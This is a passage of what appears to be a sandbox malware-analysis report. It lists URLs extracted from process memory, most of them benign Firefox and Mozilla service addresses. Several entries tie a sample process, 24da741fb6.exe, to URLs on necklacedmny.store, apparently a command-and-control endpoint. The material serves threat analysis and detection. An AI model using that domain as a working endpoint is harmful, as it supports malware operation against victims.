                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1Cache
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2884153672.00000253F03F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3343597221.00000253EFD5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                          Source: powershell.exe, 00000008.00000002.2471464999.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469949700.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/cfworker
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2744719723.00000253F454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/issues/3177
                          Source: firefox.exe, 00000020.00000003.2789703011.00000253F4531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2820751925.00000253F4533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2754762057.00000253F452D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2749775963.00000253F452B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 00000020.00000003.2789703011.00000253F4531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2820751925.00000253F4533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2754762057.00000253F452D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2749775963.00000253F452B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/issues/1266
                          Source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                          Source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                          Source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
                          Source: firefox.exe, 00000020.00000003.2668435370.00000253EC21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668905912.00000253EC25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668690950.00000253EC23C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2956394320.00000253DC711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881No
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 00000020.00000003.2894400947.00000253F6162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E88AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema.
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema./
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
                          Source: firefox.exe, 00000020.00000003.2921058628.00000253EE1D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3303094848.00000253EC7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 00000020.00000003.2885495011.00000253EF97C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 00000020.00000003.2885495011.00000253EF97C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.comremoveTabsProgressListenerbrowser.tabs.drawInTitlebartestPermissionFromPr
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                          Source: 24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2685688622.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
                          Source: 24da741fb6.exe, 0000000B.00000003.2684892037.0000000005967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
                          Source: 24da741fb6.exe, 0000000B.00000003.2578974608.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiD
                          Source: 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apis
                          Source: 24da741fb6.exe, 0000000B.00000003.2609752113.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiu
                          Source: 24da741fb6.exe, 0000000B.00000003.2583452418.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2559019773.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001171000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2578974608.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2542576099.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2527822661.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2542975784.00000000011CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/dJ;?
                          Source: 24da741fb6.exe, 0000000B.00000003.2685688622.00000000011B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/or
                          Source: powershell.exe, 00000008.00000002.2473738158.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ok.ru/
                          Source: firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 00000020.00000002.3230698047.00000253EBC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3278500608.00000253EC084000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E87EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E9424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                          Source: firefox.exe, 00000020.00000003.2881246534.00000253F46B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E87EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2884153672.00000253F03F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000020.00000003.2894400947.00000253F6162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#
